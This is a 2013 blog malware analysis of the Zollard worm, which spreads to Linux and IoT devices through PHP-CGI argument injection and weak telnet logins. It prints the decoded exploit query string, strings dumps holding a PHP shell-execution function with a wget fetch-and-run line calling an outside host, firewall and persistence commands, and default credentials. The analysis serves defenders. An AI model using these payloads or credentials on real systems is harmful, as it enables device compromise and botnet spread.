Tuesday, December 3, 2013

Hey Zollard, leave my Internet of Things alone!

We've long been tracking exploit attempts against web servers, notably CMS hosts, ColdFusion, and vanilla PHP/CGI servers. Of late, we've observed a fairly large increase in PHP exploit attempts.  So Symantec's recent report about Linux.Darlloz targeting "The Internet of Things" was of particular interest.

Recently I noted an inbound PHP exploit attempt from 78.39.232.113 - Telecommunication Company of Kordestan - Iran

PHP exploit attempt from 78.39.232.113
The decoded POST is:

-d allow_url_include=%6Fn -d safe_mode=off -d suhosin%2Esimulation=on -d disable_fu%6Ections="" -d open_basedir=none -d auto_prepend_file=php:%2F/input -d cgi.force_redirec%74=0 -d cgi.redirect_status_env=0 -n

Note the User-Agent: Zollard and the reference to the files that will attempt to be to be executed upon successful compromise. The files indicate several architectures, arm, ppc, mips, mipsel, and x86.

All files were fetched, and the x86 file was sandboxed on a linux VM.  Immediately the VM began incrementally scanning 117.201.0.0/18 for open destination port 58455.  The linux malware also opened up a listener on my VM's port 58455.

Compromised host listening on port 58455

Upon finding a remote host listening on that port, the local host would initially send 0x00020015 and would receive one of several replies including, 0x010005, 0x01010006, or 0x01020006

Depending on the reply, the scanning host would then attempt a Telnet connection to the remote host that it had previously connected to on port 58445.  Examining strings of the malware files show several usernames that are attempted, including "root" and "admin"
Weak or non-existent passwords allow for a successful telnet login, with examples below:


Example of Telnet session to a BusyBox device

Example of Telnet session to ARM architecture device

As mentioned earlier, the malware files for the x86, arm, mips, mipsel, and ppc architectures were fetched.  You may find it of interest to see a strings dump of each of the files:


#EgvT2
@ #!
!1C "
V! 0
/proc/self/exe
nodes
POST
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
function myshellexec($cmd)
global $disablefunc;
$result = "";
if (!empty($cmd))
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
return $result;
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");
HTTP/1.1 200 OK
httpd
/bin/sh
/proc
/proc/
/stat
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
telnetd
/var/run/.lightpid
/var/run/.aidrapid
/var/run/lightpid
/var/run/.lightscan
/var/run/lightscan
/var/run/mipsel
/var/run/mips
/var/run/sh
/var/run/arm
/var/run/ppc
/var/run/m
/var/run/mi
/var/run/s
/var/run/a
/var/run/p
/var/run/msx
/var/run/mx
/var/run/sx
/var/run/ax
/var/run/px
/var/run/32
/var/run/sel
/var/run/pid
/var/run/gcc
/var/run/dev
/var/run/psx
/var/run/mpl
/var/run/mps
/var/run/sph
/var/run/arml
/var/run/mips.l
/var/run/mipsell
/var/run/ppcl
/var/run/shl
/bin/pp
/bin/mi
/bin/mii
/var/tmp/dreams.install.sh
/var/tmp/ep2.ppc
/var/0.run
/var/1.run
/var/idhash
/var/response
/var/challenge
/var/b.arm_v5t
/var/b.arm_v6k
/var/f.arm_v5t
/var/f-t2.arm_v6k
/var/f-t2.mips
/var/f-t2.mipsel
/var/sp.arm_v5t
/var/sp.arm_v6k
/var/t2.arm_v6k
/var/readme
/var/b/b3.arm_v5t
/var/b/b3.arm_v6k
/var/b/b3.mips
/var/b/b3.ramips
/var/b/b3.rtl
/var/b/readme
/var/b/0.run
/var/b/1.run
/var/b/idhash
/dav/0.run
/dav/1.run
/dav/b3.arm_v5t
/dav/b3.arm_v6k
/dav/b3.mips
/dav/b3.rtl
/dav/idhash
/dav/readme
/var/b
/usr/bin/wget
/usr/bin/-wget
/var/run/z
reboot
#!/bin/sh
ls /bin/killall || ls /sbin/killall || ls /usr/bin/killall || ls /usr/sbin/killall || reboot
killall arm ppc mips mipsel
sleep 10
/var/run/.zollard/arm || /var/run/.zollard/ppc || /var/run/.zollard/mips || /var/run/.zollard/mipsel || reboot
GET / HTTP/1.1
Host:
mipsel
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/php4
EHW:
p"XW
m >
echo -n >
&& echo -e \\x5A
mkdir -p
/var/run/.zollard/
chmod +x
cp /bin/sh
admin
root
0!0
SHA1
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.shstrtab
.text
.rodata
.data
.bss
.comment

/proc/self/exe
nodes
POST
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
function myshellexec($cmd)
global $disablefunc;
$result = "";
if (!empty($cmd))
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
return $result;
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");
HTTP/1.1 200 OK
httpd
/bin/sh
/proc
/proc/
/stat
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
telnetd
/var/run/.lightpid
/var/run/.aidrapid
/var/run/lightpid
/var/run/.lightscan
/var/run/lightscan
/var/run/mipsel
/var/run/mips
/var/run/sh
/var/run/arm
/var/run/ppc
/var/run/m
/var/run/mi
/var/run/s
/var/run/a
/var/run/p
/var/run/msx
/var/run/mx
/var/run/sx
/var/run/ax
/var/run/px
/var/run/32
/var/run/sel
/var/run/pid
/var/run/gcc
/var/run/dev
/var/run/psx
/var/run/mpl
/var/run/mps
/var/run/sph
/var/run/arml
/var/run/mips.l
/var/run/mipsell
/var/run/ppcl
/var/run/shl
/bin/pp
/bin/mi
/bin/mii
/var/tmp/dreams.install.sh
/var/tmp/ep2.ppc
/var/tmp/ep2.mips
/usr/bin/wget
/usr/bin/-wget
/var/run/z
reboot
#!/bin/sh
ls /bin/killall || ls /sbin/killall || ls /usr/bin/killall || ls /usr/sbin/killall || reboot
killall arm ppc mips mipsel
sleep 10
/var/run/.zollard/arm || /var/run/.zollard/ppc || /var/run/.zollard/mips || /var/run/.zollard/mipsel || reboot
GET / HTTP/1.1
Host:
mips
mipsel
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/php4
EHW:
p"XW
m >
echo -n >
&& echo -e \\x5A
mkdir -p
/var/run/.zollard/
chmod +x
cp /bin/sh
admin
root
0!0
SHA1
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.shstrtab
.reginfo
.text
.rodata
.data.rel.ro
.data
.got
.sbss
.bss
.comment
.mdebug.abi32
.pdr
Strings from 'arm' file
Strings from 'mips' file

/proc/self/exe
nodes
POST
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
function myshellexec($cmd)
global $disablefunc;
$result = "";
if (!empty($cmd))
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
return $result;
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");
HTTP/1.1 200 OK
httpd
/bin/sh
/proc
/proc/
/stat
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
telnetd
/var/run/.lightpid
/var/run/.aidrapid
/var/run/lightpid
/var/run/.lightscan
/var/run/lightscan
/var/run/mipsel
/var/run/mips
/var/run/sh
/var/run/arm
/var/run/ppc
/var/run/m
/var/run/mi
/var/run/s
/var/run/a
/var/run/p
/var/run/msx
/var/run/mx
/var/run/sx
/var/run/ax
/var/run/px
/var/run/32
/var/run/sel
/var/run/pid
/var/run/gcc
/var/run/dev
/var/run/psx
/var/run/mpl
/var/run/mps
/var/run/sph
/var/run/arml
/var/run/mips.l
/var/run/mipsell
/var/run/ppcl
/var/run/shl
/bin/pp
/bin/mi
/bin/mii
ep2.mips
/var/tmp/dreams.install.sh
/var/tmp/ep2.ppc
/var/tmp/ep2.mips
/usr/bin/wget
/usr/bin/-wget
/var/run/z
reboot
#!/bin/sh
ls /bin/killall || ls /sbin/killall || ls /usr/bin/killall || ls /usr/sbin/killall || reboot
killall arm ppc mips mipsel
sleep 10
/var/run/.zollard/arm || /var/run/.zollard/ppc || /var/run/.zollard/mips || /var/run/.zollard/mipsel || reboot
GET / HTTP/1.1
Host:
mipsel
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/php4
EHW:
p"XW
m
GYvh
QdV[3
y8G9
lQ\a< >
echo -n >
&& echo -e \\x5A
mkdir -p
/var/run/.zollard/
chmod +x
cp /bin/sh
admin
root
0!0
SHA1
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.shstrtab
.reginfo
.text
.rodata
.data.rel.ro
.data
.got
.sbss
.bss
.comment
.mdebug.abi32
.pdr
/proc/self/exe
nodes
POST
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
function myshellexec($cmd)
global $disablefunc;
$result = "";
if (!empty($cmd))
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
return $result;
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");
HTTP/1.1 200 OK
httpd
/bin/sh
/proc
/proc/
/stat
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
telnetd
/var/run/.lightpid
/var/run/.aidrapid
/var/run/lightpid
/var/run/.lightscan
/var/run/lightscan
/var/run/mipsel
/var/run/mips
/var/run/sh
/var/run/arm
/var/run/ppc
/var/run/m
/var/run/mi
/var/run/s
/var/run/a
/var/run/p
/var/run/msx
/var/run/mx
/var/run/sx
/var/run/ax
/var/run/px
/var/run/32
/var/run/sel
/var/run/pid
/var/run/gcc
/var/run/dev
/var/run/psx
/var/run/mpl
/var/run/mps
/var/run/sph
/var/run/arml
/var/run/mips.l
/var/run/mipsell
/var/run/ppcl
/var/run/shl
/bin/pp
/bin/mi
/bin/mii
ep2.ppc
/var/tmp/dreams.install.sh
/var/tmp/ep2.ppc
/usr/bin/wget
/usr/bin/-wget
/var/run/z
reboot
#!/bin/sh
ls /bin/killall || ls /sbin/killall || ls /usr/bin/killall || ls /usr/sbin/killall || reboot
killall arm ppc mips mipsel
sleep 10
/var/run/.zollard/arm || /var/run/.zollard/ppc || /var/run/.zollard/mips || /var/run/.zollard/mipsel || reboot
GET / HTTP/1.1
Host:
mips
mipsel
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/php4
EHW:
p"XW
m
GYvh
QdV[3
y8G9
lQ\a< >
echo -n >
&& echo -e \\x5A
mkdir -p
/var/run/.zollard/
chmod +x
cp /bin/sh
admin
root
0!0
SHA1
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.shstrtab
.text
.rodata
.data
.sbss
.bss
.comment
Strings from 'mipsel' file
Strings from 'ppc' file
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
function myshellexec($cmd)
global $disablefunc;
$result = "";
if (!empty($cmd))
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
return $result;
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");
HTTP/1.1 200 OK
httpd
nodes
/bin/sh
GET / HTTP/1.1
Host:
/proc
/proc/
/stat
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
telnetd
/var/run/.lightpid
/var/run/.aidrapid
/var/run/lightpid
/var/run/.lightscan
/var/run/lightscan
/var/run/mipsel
/var/run/mips
/var/run/sh
/var/run/arm
/var/run/ppc
/var/run/m
/var/run/mi
/var/run/s
/var/run/a
/var/run/p
/var/run/msx
/var/run/mx
/var/run/sx
/var/run/ax
/var/run/px
/var/run/32
/var/run/sel
/var/run/pid
/var/run/gcc
/var/run/dev
/var/run/psx
/var/run/mpl
/var/run/mps
/var/run/sph
/var/run/arml
/var/run/mips.l
/var/run/mipsell
/var/run/ppcl
/var/run/shl
/bin/pp
/bin/mi
/bin/mii
/var/tmp/dreams.install.sh
/var/tmp/ep2.ppc
/usr/bin/wget
/usr/bin/-wget
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/php4
EHW:
p"XW
m >
echo -n >
&& echo -e \\x5A
mkdir -p
/var/run/.zollard/
chmod +x
cp /bin/sh
root
1234
12345
dreambox
smcadmin
0!0
SHA1
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.shstrtab
.text
.rodata
.data
.bss
.comment
Strings from 'x86' file

So who is "Zollard"?  What is the relationship between the scanned targets and the original scanner?
There is a good deal more research to be done on this malware, as well as the hosting infrastructure supporting these exploit attempts.  At this point, we believe that the malware hosting location is a compromised host, and is not part of this campaign.

We recommend the blocking of IP address 78.39.232.113 and ensuring that all Internet facing devices, yes "devices" are strongly secured. 

2 comments:

  1. I got something similar. Different source IP though:

    14.136.48.11 - - [30/Dec/2013:06:33:02 -0500] "POST /cgi-bin/php4?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 444 0 "-" "Zollard" "-"

    ReplyDelete
  2. The post part (I've received the same string) resolves to:
    ?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions=”" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n

    ReplyDelete